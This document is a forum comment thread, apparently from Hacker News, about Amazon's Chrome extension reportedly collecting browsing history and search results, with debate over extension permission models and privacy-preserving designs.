This sort of abusive, insecure extension poisons the well for all extension developers. Now, I wish to submit a couple of feature requests to the Chrome team.
1) I wish there was a way by which an extension could declare its access patterns in much more fine-grained manner (kinda like CORS headers). Then I can prove to my users that my extension cannot do the sort of ugly crap that Amazon is doing.
2) Second is an API to expose details of an XMLHTTPRequest's (or maybe even 'document' object's) SSL server certificate. Even a binary blob will do: I can parse it in JS. Without this, you can't do "certificate pinning" for extensions.
Chrome extension permissions are too coarse-grain. Why is DOM write permission not separated from DOM read perms?
If Google doesn't crack down on abusive extensions like this, they risk users losing trust in the Chrome "brand". Just my 2 cents.
A way for users to restrict some permissions of an app would be good, but a UX/support problem when they disable something that breaks core functionality.
That's for the extension devs to handle. I'm personally in favor of the following:
1) Users can enable or disable any permission they like
2) This is transparent to developers - i.e. if you access geolocation, you'll always get one. It just won't be the right one if you don't have permission.
3) The extension is allowed to query which permissions I've given. So devs can handle blocked permissions more gracefully if they choose.
Most extensions don't need much access, but this one does price comparisons as you browse. How else would it work unless it knows what you browse? Perhaps using activeTab could work, that might even be something I would use.
At least these extensions are .js files that you can read and that Chrome does tell you what it can access (and lets you see that after they are installed). A lot better than the situation for desktop software.
It's a surprise that there hasn't been more exploits through major extensions - or maybe they've just not been discovered yet - either by a malicious developer or a repo being compromised.
I keep them mostly disabled - just can't fathom why a simple extension (e.g. to pretty print JSON) seems to need the access levels on the install warnings.
Chrome looks more and more insecure browser day by day. If the Chrome team gets their act together just not to show saved passwords in clear text I would say it would be big win for all its unsuspecting users.
My paranoia in installing extensions is finally justified. If Amazon is pulling these kind of stunts, then imagine the kind of mischief the smaller apps are pulling off.
This whole "scorched earth"-style permissions model that users can't make educated decisions about is what annoys me about current platforms like Chrome, Android and iOS.
JavaME had an interesting model where the app asks permissions after it is installed (e.g. internet access, local file system access) for each thing it wants to do. And the app has to consider the fact that the user can decide not to grant that particular permission. Of course, once you decide to trust the app, you could disable the prompts.
> where the app asks permissions after it is installed (e.g. internet access, local file system access) for each thing it wants to do
iOS does the same for the permissions it supports (access to photo library, contacts, GPS/location, twitter accounts, etc etc), but a lot of things are always allowed (such as internet access). Facebook also lets you deny specific permissions to apps on their platform. I've always wondered why Android and browser extensions don't let you line-veto deny permissions.
> Facebook also lets you deny specific permissions to apps on their platform
Which, of course, is ironic given that every update to the facebook app on Android asks for more and more permissions, to the point where it can do almost anything now.
The "news" part of this is that the extension allegedly reports all the URLs you've visited to amazon, including https ones, plus some reporting of site contents to alexa.
Which sort of shows what a farce this hullaboo about information sharing is. "Megacorp promises not to share your information with other companies", but Megacorp owns dozens to hundreds of company-like projects anyway.
I think these agreements are in place so that if a malicious employee is hired and he accesses your data without authorization, they can fire the employee and be done. If their privacy policy said they wouldn't share the data, then they'd have to pay you damages. Since users aren't demanding actual privacy but do demand damages when they technically can, one would expect every company to write this sort of policy.
I believe that in the US (as opposed to the EEA) companies are allowed to share most non-sensitive data with affiliates and partners as long as they tell you that and provide an "Opt-Out" clause in their privacy statement. The default there is that data is shared unless you demand otherwise. If companies want to share sensitive data (medical info and the like) they also have to mention in this in their privacy statement but the clause there must be "Opt-In" instead with the default being that data is not shared.
That's why in my Chrome extension that allows you to discover whether pages have been submitted on reddit as you browse [1], I was cautious with the fact that reddit is sent the URLs over HTTP.
It has a Privacy section in the settings that lets you enable Wait For Click so URLs are only checked upon explicit request. It also lets you exclude domains or URL regular expressions from automatically checking the URL, forcing those to be Wait for Click.
Plus, it comes with smart defaults. Default excluded domains include popular banks, Gmail and Google Docs. Default excluded regular expressions match Google/Yahoo/Bing SERPs and various protocols that you probably don't want checked.
All it takes are some smart defaults and a small amount of development [2], and you can protect your users' privacy. It's worth it.
Not sure if reddit supports it, but this is how we did our extension at an old startup I worked for.
We allowed users to share post-it note style comments on web sites with their friends; for example, I could leave you a little note on the hackernews front page, and the next time you go to the site you would see the not sitting on top of it.
In order to do this, we had to check every page you visited to see if there was a slide for you on it. We cared about privacy, so we took a hash of each URL and sent it instead of the URL itself. While we would know what site you are on if we happened to get a hit (i.e. you had a note on the page), we wouldn't know what site you were on if there was no note.
Of course, this was all based on the users trusting us to not change our code. There was nothing preventing us from changing how we sent the URLs. The level of access extensions get is SCARY. I don't think users realize what exactly they are allowing when they install them.
Hey, that's awesome! Your design reminds me of "hoodwink'd", which was "underground" in the sense that you had to edit your DNS settings for "hoodwink'd" to work. http://ecmanaut.blogspot.com/2006/01/hoodwinkd.html
Your site URL hashing system is also pretty close how Goggles works, only instead of notes, you get to draw MS paint-like scribbles. http://goggles.sneakygcr.net
Each website is uniquely keyed by a hash of the URL, so Goggles doesn't know the website's URL even if there is a hit. (It does send the page title to the server though because popular sites go on a leaderboard; i'm not so sure about that decision though since it can leak some privacy...)
Browsers are doing a much better job at protecting/restricting bookmarklets than extensions and I wish more of these kinds of notetaking apps/tricks use bookmarklets instead. For example, I just now discovered that Chrome will prevent Goggles from working on certain HTTPS sites like hacker news because it loads javascript from an http:// URL, which is a great design decision from the Chrome team.
I'm not exactly encouraged by Amazon's "fix": they simply started serving their custom spy instructions over https. It almost tempts me to write a different extension to observe these instructions and then crowd-source a database of them. What nefarious shit are they doing, that justifies this extra layer of indirection?
Read the article. The configuration from amazon is only set up to gather https data on amazon sites. Because the configuration was sent over http, he used a man in the middle attack to change it to a wildcard, and gather all https data.
Amazon wasn't being evil, just incompetent. Never attribute to malice what can adequately be explained by stupidity...
So logging every single URL you visit and every search you make on Google isn't evil? This is the kind of nasty extension that your browser warns you about when you open a private/incognito window. I realize you were just talking about the HTTPS aspect of it, but your parent asked about the generic "this".
It's pretty clear they "might do this" so they can data-mine your browsing activity, which is now associated with your account, and serve you more targeted ads and product recommendations. So I guess we have to extend your catch-phrase with "...and never attribute to stupidity what can be adequately explained by greed."
> every single URL you visit and every search you make on Google isn't evil
No, it's not evil, it's the the point of the extension -- to do product search.
If you don't like the product, you don't have to use it, but you can't say you want it, and then say it's evil for doing exactly what it says on the tin.
No, keep reading. It is more targeted than that. It sniffs the results of your Google searches , and sends the result over HTTP (not HTTPS) to Alexa. (See "It reports contents of certain websites you visit to Alexa") It knows you are searching Google because they have a special whitelist that detects when you are visiting Google's URLs, even the encrypted ones.
What about the script that they inject to every page you ever visit? Its completely useless - it contains an empty script and does nothing at all. What reason would they have to add this?
That simple empty script allows them, at any point in the future, to remotely inject scripts that'll have full permissions over any website you visit, without having to push an extension update or have it as part of their core extension code.
They can also choose to send it to specific individuals, or only for specific websites (their script URL gets the visited page as an query string argument), making something like this extremely difficult to detect.
And of course, this could also be abused by someone who hacks their servers. He could, for example, inject a script that sends the user/password whenever you login to a bank or paypal.
Having remote code execute on every page you ever visit is either extremely stupid or an extremely smart way to spy on people without being detected. When the code is part of the extension itself and not remote it: 1) has to be signed (making abuse harder for a malicious hacker) and 2) can be more easily audited, as all users of the extension would get the "spying code" (making abuse harder for a malicious company)
Not entirely benign, but understandable: above all else, Amazon wants to know exactly what search results Google shows you for particular queries, so they can better understand Google's ranking policies.
They can't otherwise scrape search results as you, and getting the info as an anonymous user isn't nearly as valuable. So they need you, via an extension or toolbar, to (perhaps inadvertently) opt-in to letting them collect the data 'over your shoulder'.
Sadly, Amazon isn't alone in this. There is no secure CSP that Chrome implements for any of its extensions, and they don't require and sort of legitimate oversight, so I would venture to guess that there are at least a few dozen extensions that are just as bad.
I'd like to snoop on my (self initiated) https traffic so I can write a monitor for a third party web app that is only available over https. In a similar situation but with clear text, I've made use of a perl proxy that generates code mimicking the browser initiated transaction, which can then be lightly modified into a Nagios managed monitor for that kind of transaction.
The described technique looks like it might get me some of the way there, but it's kind of a square peg to my round hole. My google/stackoverflow searches aren't getting me very far; I found a reference to jmeter acting as an https client proxying http, but that looks like a similarly deep hole. Maybe it's easier than it looks; I don't know.
I'm no browser expert, but I'm not particularly afraid of javascript.
I'm one of the Disconnect devs and these definitely aren't stupid questions:
1. Unlike that other "privacy" cough extension, Disconnect doesn't send any data (user or otherwise) to Disconnect servers. In other words, Disconnect doesn't output user data that can be intercepted by a MITM attack. Disconnect does grab a config file on startup (https://disconnect.me/help#syncing), but unlike in the Amazon case, the file is both transferred over HTTPS and encrypted (with the Stanford Javascript Crypto Library). Also unlike in the Amazon case, the file has a limited functional scope (which third-party sites to block) so is less susceptible to being rewritten in an abusive way.
2. One of our other Chrome extensions, Collusion for Chrome, will actually show you requests that are coming from other extensions. The more technical approach, which isn't that hard and I'd like to see more people try, is to run a packet sniffer (recommended: http://www.wireshark.org/) or proxy server (recommended: http://www.charlesproxy.com/).
I don't know of any, but I imagine there are a bunch on YouTube and so forth. I will say that of the two, Charles is the easier to use and I don't think too hard to figure out without any docs.
So if the user has Javascript disabled, what happens then?
It seems so many exploits rely on Javascript.
Would a user ever be willing to sacrafice a little "user experience" (accomplished with Javascript) for protection against easy exploits?
Is that question ever left to the user?
Not if a website provides Javascript-free means of interacting with it; and demands that the user enable Javascript (=you "must" enable Javascript to use this site).
In this case it doesn't matter too much if you disable javascript because extensions are still working. The disable javascript option disables only the script in website contents not in extensions. So it will disabled scripts injected into the pages but scripts in extensions are still working.
Why is this a big surprise? I'm sure that you would find similar features on the eBay extension or any other 3rd party online store. The problem is really in how the permissions are displayed and users are so willing to give full access to their browser through extensions.
The extension is available in the official Chrome Web Store. Apparently, Google doesn't verify extensions for malicious behavior – or maybe such behavior is even desired …
wow, i'm shocked that amazon would stoop so low. what's next, the yahoo toolbar stops being a convenient and secure way to search the web and gets into the spyware business?
1) I wish there was a way by which an extension could declare its access patterns in much more fine-grained manner (kinda like CORS headers). Then I can prove to my users that my extension cannot do the sort of ugly crap that Amazon is doing.
2) Second is an API to expose details of an XMLHTTPRequest's (or maybe even 'document' object's) SSL server certificate. Even a binary blob will do: I can parse it in JS. Without this, you can't do "certificate pinning" for extensions.
Chrome extension permissions are too coarse-grain. Why is DOM write permission not separated from DOM read perms?
If Google doesn't crack down on abusive extensions like this, they risk users losing trust in the Chrome "brand". Just my 2 cents.